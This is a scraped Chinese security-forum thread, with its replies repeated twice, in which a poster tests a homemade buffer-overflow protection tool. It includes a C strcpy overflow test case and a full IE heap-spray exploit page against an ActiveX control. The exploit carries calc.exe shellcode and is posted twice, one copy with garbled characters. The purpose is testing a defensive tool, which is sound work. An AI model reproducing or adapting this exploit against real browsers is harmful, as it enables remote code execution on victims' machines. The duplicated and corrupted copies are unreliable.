国产防溢工具,版本更新至156，攻击日志，漏洞类型判断开启-WEB安全-看雪-安全社区|安全招聘|kanxue.com

最新回复 (13)
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 2 楼贴图一张 2010-10-15 12:29 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 3 楼 Heap Spray 测试用例上传的附件： heap spray测试.PNG （9.04kb，405次下载） 2010-10-15 12:54 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 4 楼 str* 系列函数 testcase 部分代码 void teststring3() { char test[24]; strcpy(test,"aadsfsadfasdfdafadfadfasdfasfsafdsafasfdsafasfsafasdfafafafasfasfasfasdfdsafasdfasdfasfasdfasfsadfdsafsdfafdsfdafadsfdfadsfa"); } 2010-10-15 12:55 0
iiii 雪币： 393 活跃值： (100) 能力值： ( LV6，RANK：80 ) 在线值：发帖 16 回帖 218 粉丝 0 关注私信	iiii 1 5 楼全是空白上传的附件： TM截图未命名.png （22.98kb，351次下载） 2010-10-17 10:24 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 6 楼请拿网页溢出攻击代码测试 2010-10-17 13:55 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 7 楼比如这个网页 <html> <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object> <script language='javascript'> // Payload is win32_exec - calc.exe shellcode = unescape('%uc931��⑴寴玁㴓幆莕'+ 'ﳫ껁锚䘽탕촁逢䝅ằ'+ '干쫕䜝��状铕矓ಞ슑'+ '蜺颔萼憵ሆ酺ꍈ쫕䜙'+ '䪶ḕ婢繟媶铕쿖넂蔹啯'+ '쵙ꔞ蚸餦ڶṒ婍ỳ乕鲵'+ '욶问䘽﷕ᤁ捯ၝ淗蚾씥'+ '㡕瞆⹎毆䢷樉◚錄䙞镞'); nops=unescape('邐邐'); headersize = 69; //size adjusted for IE6/IE7 "universality" slackspace= headersize + shellcode.length; while(nops.length<slackspace) nops+=nops; fillblock=nops.substring(0,slackspace); block=nops.substring(0,nops.length-slackspace); while(block.length+slackspace<0x40000) block=block+block+fillblock; memory=new Array(); for( counter=0; counter<250; counter++) memory[counter]= block + shellcode; ret=''; for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a"); target.LoadProperties(ret); </script> </html> 2010-10-17 14:03 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 8 楼比如这个网页 <html> <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object> <script language='javascript'> // Payload is win32_exec - calc.exe shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+ '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+ '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+ '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+ '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'); nops=unescape('%u9090%u9090'); headersize = 69; //size adjusted for IE6/IE7 "universality" slackspace= headersize + shellcode.length; while(nops.length<slackspace) nops+=nops; fillblock=nops.substring(0,slackspace); block=nops.substring(0,nops.length-slackspace); while(block.length+slackspace<0x40000) block=block+block+fillblock; memory=new Array(); for( counter=0; counter<250; counter++) memory[counter]= block + shellcode; ret=''; for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a"); target.LoadProperties(ret); </script> </html> 2010-10-17 14:08 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 9 楼这是啥原理啊 2010-10-17 14:20 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 10 楼见新版界面图即可知。上传的附件：状态主界面.PNG （45.65kb，315次下载） 2010-10-17 22:16 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 11 楼看不懂啊。大牛讲解一下噻 2010-10-18 09:29 0
Loka 雪币： 993 活跃值： (442) 能力值： ( LV12，RANK：403 ) 在线值：发帖 23 回帖 131 粉丝 0 关注私信	Loka 2 12 楼 [QUOTE=iiii;873041]全是空白 [/QUOTE] 我也一样 2010-10-18 10:24 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 13 楼我只是个卖茶叶的小商贩，如需茶叶批发请与我联系。 2010-10-18 15:00 0
lixupeng 雪币： 563 活跃值： (95) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 1636 粉丝 0 关注私信	lixupeng 14 楼硬件防溢出不会是DEP保护吧 2010-10-21 08:15 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (13)
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 2 楼贴图一张 2010-10-15 12:29 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 3 楼 Heap Spray 测试用例上传的附件： heap spray测试.PNG （9.04kb，405次下载） 2010-10-15 12:54 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 4 楼 str* 系列函数 testcase 部分代码 void teststring3() { char test[24]; strcpy(test,"aadsfsadfasdfdafadfadfasdfasfsafdsafasfdsafasfsafasdfafafafasfasfasfasdfdsafasdfasdfasfasdfasfsadfdsafsdfafdsfdafadsfdfadsfa"); } 2010-10-15 12:55 0
iiii 雪币： 393 活跃值： (100) 能力值： ( LV6，RANK：80 ) 在线值：发帖 16 回帖 218 粉丝 0 关注私信	iiii 1 5 楼全是空白上传的附件： TM截图未命名.png （22.98kb，351次下载） 2010-10-17 10:24 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 6 楼请拿网页溢出攻击代码测试 2010-10-17 13:55 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 7 楼比如这个网页 <html> <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object> <script language='javascript'> // Payload is win32_exec - calc.exe shellcode = unescape('%uc931��⑴寴玁㴓幆莕'+ 'ﳫ껁锚䘽탕촁逢䝅ằ'+ '干쫕䜝��状铕矓ಞ슑'+ '蜺颔萼憵ሆ酺ꍈ쫕䜙'+ '䪶ḕ婢繟媶铕쿖넂蔹啯'+ '쵙ꔞ蚸餦ڶṒ婍ỳ乕鲵'+ '욶问䘽﷕ᤁ捯ၝ淗蚾씥'+ '㡕瞆⹎毆䢷樉◚錄䙞镞'); nops=unescape('邐邐'); headersize = 69; //size adjusted for IE6/IE7 "universality" slackspace= headersize + shellcode.length; while(nops.length<slackspace) nops+=nops; fillblock=nops.substring(0,slackspace); block=nops.substring(0,nops.length-slackspace); while(block.length+slackspace<0x40000) block=block+block+fillblock; memory=new Array(); for( counter=0; counter<250; counter++) memory[counter]= block + shellcode; ret=''; for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a"); target.LoadProperties(ret); </script> </html> 2010-10-17 14:03 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 8 楼比如这个网页 <html> <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object> <script language='javascript'> // Payload is win32_exec - calc.exe shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+ '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+ '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+ '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+ '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'); nops=unescape('%u9090%u9090'); headersize = 69; //size adjusted for IE6/IE7 "universality" slackspace= headersize + shellcode.length; while(nops.length<slackspace) nops+=nops; fillblock=nops.substring(0,slackspace); block=nops.substring(0,nops.length-slackspace); while(block.length+slackspace<0x40000) block=block+block+fillblock; memory=new Array(); for( counter=0; counter<250; counter++) memory[counter]= block + shellcode; ret=''; for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a"); target.LoadProperties(ret); </script> </html> 2010-10-17 14:08 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 9 楼这是啥原理啊 2010-10-17 14:20 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 10 楼见新版界面图即可知。上传的附件：状态主界面.PNG （45.65kb，315次下载） 2010-10-17 22:16 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 11 楼看不懂啊。大牛讲解一下噻 2010-10-18 09:29 0
Loka 雪币： 993 活跃值： (442) 能力值： ( LV12，RANK：403 ) 在线值：发帖 23 回帖 131 粉丝 0 关注私信	Loka 2 12 楼 [QUOTE=iiii;873041]全是空白 [/QUOTE] 我也一样 2010-10-18 10:24 0
antime 雪币： 315 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 45 回帖 303 粉丝 0 关注私信	antime 13 楼我只是个卖茶叶的小商贩，如需茶叶批发请与我联系。 2010-10-18 15:00 0
lixupeng 雪币： 563 活跃值： (95) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 1636 粉丝 0 关注私信	lixupeng 14 楼硬件防溢出不会是DEP保护吧 2010-10-21 08:15 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复